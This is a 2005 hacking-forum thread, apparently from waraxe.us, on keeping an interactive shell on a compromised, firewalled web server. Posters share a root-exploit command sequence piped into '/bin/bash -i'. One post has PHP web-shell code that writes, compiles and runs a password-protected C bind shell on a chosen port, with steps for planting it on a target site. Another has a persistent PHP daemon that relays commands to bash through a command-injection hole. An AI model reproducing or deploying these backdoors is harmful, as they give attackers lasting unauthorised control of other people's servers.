|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 66
Members: 0
Total: 66
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Interactive shell on php |
|
Posted: Fri Apr 08, 2005 11:08 pm |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
I post this to discuss methods of getting something like an interactive shell via php.
It?ll very usefull for servers with very restrictive firewalls that don?t allow you to use any kind of backdoor (either reverse, or non TCP backdoors), so the only way to do sometihing is via the php shell.
The method I use to get root and make some things is the following:
echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i
is a very uncomfortable way, but works for me
It?ll nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot y made in C, forking and using pipes, but in php you are more restricted). Is a good proyect to try...?any ideas? |
|
|
|
|
|
|
|
|
Posted: Sat Apr 09, 2005 4:59 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
I dont have any ideas but I must admit its a firken cool idea.
C you have more options but I truely like php more. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
Re: Interactive shell on php |
|
Posted: Sat Apr 09, 2005 3:07 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
erg0t wrote: | I post this to discuss methods of getting something like an interactive shell via php.
It?ll very usefull for servers with very restrictive firewalls that don?t allow you to use any kind of backdoor (either reverse, or non TCP backdoors), so the only way to do sometihing is via the php shell.
The method I use to get root and make some things is the following:
echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i
is a very uncomfortable way, but works for me
It?ll nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot y made in C, forking and using pipes, but in php you are more restricted). Is a good proyect to try...?any ideas? |
sorry , i dont understand what are u trying to explain
from what i see u just running exploit , then u get some root account by using "id" to check that
so ? what is the interensting point ?
or maybe i just dont get what u mean
if u need some more good "php shell" that more interactive n without restiction/break the restriction, u need to start browsing more to this forum, coz we've allready discuss it |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Sat Apr 09, 2005 3:47 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
yes is very good method for root servers whit firewall or not possible for reverse shell
in one file .txt add this content
-------------------------------------------------
echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
-----------------------------------------------------
final command is: cat commands | /bin/bash -i
whit line run all commands in txt file, for what ergot run this ? simple for this server have firewall not is possible exec one backdoor and not possible exec reverse shell is very good method
good ergot and me , need more ideas for develop one irc bot or similar
PD: normal irc bot or phpshell not is possible get root in one server, for get root need linux shell
if one waraxe member need share ideas for this theme connect in IPV6.GIGACHAT.NET 6667 #uruguay
or SSL connection /server -e irc.gigachat.net 6697 ou /server irc.gigachat.net +6697 #Gigachat
channel #uruguay or contact whit me in channels #asc #infektion #simiens |
|
|
|
|
|
|
Re: Interactive shell on php |
|
Posted: Sat Apr 09, 2005 10:41 pm |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
y3dips wrote: | erg0t wrote: | I post this to discuss methods of getting something like an interactive shell via php.
It?ll very usefull for servers with very restrictive firewalls that don?t allow you to use any kind of backdoor (either reverse, or non TCP backdoors), so the only way to do sometihing is via the php shell.
The method I use to get root and make some things is the following:
echo "cd /dir_of_the_xpl" > commands
echo "./xpl" >> commands
# And here the commands, for example...
echo "id" >> commands
echo "ls /root" >> commands
# And then
cat commands | /bin/bash -i
is a very uncomfortable way, but works for me
It?ll nice if you have any ideas to try to make an interactive shell in php (the only place I could put an interactive shell was in an irc bot y made in C, forking and using pipes, but in php you are more restricted). Is a good proyect to try...?any ideas? |
sorry , i dont understand what are u trying to explain
from what i see u just running exploit , then u get some root account by using "id" to check that
so ? what is the interensting point ?
or maybe i just dont get what u mean
if u need some more good "php shell" that more interactive n without restiction/break the restriction, u need to start browsing more to this forum, coz we've allready discuss it |
The point is, when you call system(), etc, you don?t have an interactive shell, for example, if you make system("cd /tmp") ; and then system("pwd") ; (if the script isn?t in /tmp of course) the pwd call will not return /tmp.
Because after system returns the shell is killed.
This is a problem when you try to use local exploits, so the idea is to try to make an interactive shell.
I was thinking for example keep runing an /bin/bash -i in second plane, redirecting the input and output to temporaly files, and reading and writing them.
I did something like using pipes in C bot im developing.
You can see the sources in http://saure.no-ip.org/tools/eva/eva.c and http://saure.no-ip.org/tools/eva/eva.h (if you can?t enter is becuase my server is d onw in the moment so try later).
I don?t know if is posibly to make somethin like it in php, but we need to try |
|
|
|
|
|
|
Re: Interactive shell on php |
|
Posted: Sun Apr 10, 2005 3:18 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
erg0t wrote: |
The point is, when you call system(), etc, you don?t have an interactive shell, for example, if you make system("cd /tmp") ; and then system("pwd") ; (if the script isn?t in /tmp of course) the pwd call will not return /tmp.
Because after system returns the shell is killed.
This is a problem when you try to use local exploits, so the idea is to try to make an interactive shell.
I was thinking for example keep runing an /bin/bash -i in second plane, redirecting the input and output to temporaly files, and reading and writing them.
I did something like using pipes in C bot im developing.
You can see the sources in http://saure.no-ip.org/tools/eva/eva.c and http://saure.no-ip.org/tools/eva/eva.h (if you can?t enter is becuase my server is d onw in the moment so try later).
I don?t know if is posibly to make somethin like it in php, but we need to try |
now , i got the point
doin some backdooring rait ?
you can do it with php but you have to run the script (web browser) all the time (or you need to run it when u need to enter)
ive seen some php shell doin that, just binding to one port (but not reverse like LINUX said )
maybe something like this
Code: |
/* Bind Shell on port */
$port_bind_bd_c="
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(argc < 3) usage(argv[0]);
if(fork() == 0) { // Ответвляем новый процесс
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror(\"socket error\");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,\"Password:\",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system(\"echo welcome to r57 shell && /bin/bash -i\");
else
fprintf(stderr,\"Sorry\");
close(newfd);
}
}
}
int usage(char *progname)
{
fprintf(stderr,\"USAGE:%s <port num> <password>\n\",progname);
exit(0);
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}";
?>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>Bind port to /bin/bash</div></b></font></td></tr>
<tr><td>
<?
/* port bind form */
echo "<form name=bind method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b>Port <font face=Wingdings color=gray>и</font></b>";
echo "<input type=text name=port size=15 value=55556> ";
echo "<b> Password <font face=Wingdings color=gray>и</font> </b>";
echo "<input type=text name=bind_pass size=15 value=> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=hidden name=bind size=1 value=bd.c>";
echo " <input type=submit name=submit value=\" Bind \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<?
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
{
$w_file=fopen("/tmp/bd.c","ab+") or exit();
fputs($w_file,$port_bind_bd_c);
fclose($w_file);
$_POST['cmd']="cd /tmp/; gcc -o bd bd.c; ./bd ".$_POST['port']." ".$_POST['bind_pass']."; ps -aux | grep bd";
}
?>
|
|
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Sun Apr 10, 2005 4:03 am |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
Are you saying to run a backdoor and connect to it with a client runing from the same machine and doing the client in php?
So, locally bypass the firewall?
Is a good Idea but in this case better using UNIX sockets, or fifos or something else.
I think the better choice is UNIX sockets because they are bidirectional so with one socket you can do the same that with 2 pipes or fifos.
So the way that you propose to follow is to make an server in other language, and the client only in php.
Is a very good idea but it?ll REALY COOL to try to make all in php. |
|
|
|
|
|
|
|
|
Posted: Sun Apr 10, 2005 11:29 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
erg0t wrote: | Are you saying to run a backdoor and connect to it with a client runing from the same machine and doing the client in php?
So, locally bypass the firewall?
Is a good Idea but in this case better using UNIX sockets, or fifos or something else.
I think the better choice is UNIX sockets because they are bidirectional so with one socket you can do the same that with 2 pipes or fifos.
So the way that you propose to follow is to make an server in other language, and the client only in php.
Is a very good idea but it?ll REALY COOL to try to make all in php. |
no, here the scenario..
- save the script as bd.php in "target " machine
- then access it with your browser to , eg : http://lame.com/phpbb/bd.php
- then input the port , password n running the port binding
- open your shell , then do some telnet to http://lame.com [port]
its just another bindtelnet but running on webserver
thats all |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Sun Apr 10, 2005 2:56 pm |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
But we are talking about firewalled servers, we can?t use backdoors, this is why this thread |
|
|
|
|
|
|
|
|
Posted: Sun Apr 10, 2005 7:28 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
its quite hard to understand what you try to achive here, but at first i made a
usual tcp backdoor in php5 (if you're interested i still have it). but then (i think)
i understood what you needed. a shell thorught php (web security hole) which would not dissappear. but you cant put a backdoor because of firewalls and only thing you got is that security hole.
anyway heres code:
Code: |
<?php
/*
By Heintz to http://www.waraxe.us.
in.txt is file where you put (echo "pwd" > in.txt) commands.
predefined commands:
"quit" - will stop the demon.
"clear" - truncates out.txt
out.txt is where you get results from bash
this is little demon that "listens" to in.txt as it would be binded to some port ;)
*/
set_time_limit(0);
$in = 'in.txt';
$bashout = 'out.txt';
$bashin = popen('bash > ' . $bashout, 'w');
if($bashin == false)
{
echo "could not open bash\n";
exit(1);
}
while(1)
{
clearstatcache();
$read = stat($in);
if($read['size'] > 0)
{
$script_in = fopen($in, 'r');
while(flock($script_in, LOCK_EX) == false)
{
sleep(1);
}
$data = fread($script_in, filesize($in));
flock($script_in, LOCK_UN);
fclose($script_in);
@fclose(@fopen($in, 'w')); // truncate
$data = trim($data);
if($data == 'quit')
{
break;
}
elseif($data == 'clear')
{
fclose(fopen($bashout, 'w'));
continue;
}
fputs($bashin, $data . "\n");
}
sleep(1);
}
@pclose($bashin);
exit();
?>
|
i hope this is the thing you were after |
|
_________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
|
|
|
Posted: Sun Apr 10, 2005 8:02 pm |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
I THINK YOU MAKE IT MAN!
I don?t know php but i think I understood your code and I?m sure that it?s what I was looking for.
Congratulations and thankyou!
salu2 |
|
|
|
|
Posted: Mon Apr 11, 2005 3:00 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
erg0t wrote: | But we are talking about firewalled servers, we can?t use backdoors, this is why this thread |
yupe, but if u use php shell or even cgi-telnet , u wont need to think about firewall, because port 80 always open
if u want some reverse shell to ure machine with php , i still dont find it |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Mon Apr 11, 2005 3:10 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
Heintz : i understand your script , n i already try it, but it wont work
here the scenario :
1. i copy your script to bd.php
2. i make in.txt and out.txt with permission 777 (????? <-- koz, web server will write to this file , insecurity ???? )
3. i make some command n put into in.txt ? (am i right ?)
for example
//in.txt---
echo "pwd" > out.txt
4. i run my web browser , point the url to http://loclahost/~y3dips/bd.php
5. what i got here ?
- the page are stalled (bd.php are processing without any output in browser , i understand about this )
- script running
#ps -axf
4320 ? S 0:00 \_ /usr/sbin/httpd
4398 ? S 0:00 | \_ sh -c bash > out.txt
4399 ? S 0:00 | \_ bash
but, nothing output when i tail to out.txt
# tail -f public_html/out.txt
CMIIW
give me some short n real scenario , so i can try
sorry for my dumb question |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Mon Apr 11, 2005 12:13 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
heres how you should use it
lets say you got a vulnearability in site "a", which lets you execute commands through one of php program execution programs lets say system().
but the site "a" got firewall which doesn't allow anything other than webserver connect to server or from server. so you cant create a backdoor.
this is where this script comes in handy. lets say you echo or wadeva get this thing up to site a/script.php and manage to execute it (either from command line or by visiting it from web). now you start giveing it commands "through" that vulnearability. like system('echo "pwd" > in.txt'); this script reads the command from in.txt and executes it and returns output to out.txt. and you could then read out.txt like system('cat out.txt'); but the script runs all the time so your shell "stays". so now you can give it manually commands.
edit:
this script is not supposed to be a all-platform ready to use app. there may be php safe mode which i have not tested and so on. this is where your own skills come in. i just showed one way to make a solution to this kind of problem. |
|
_________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|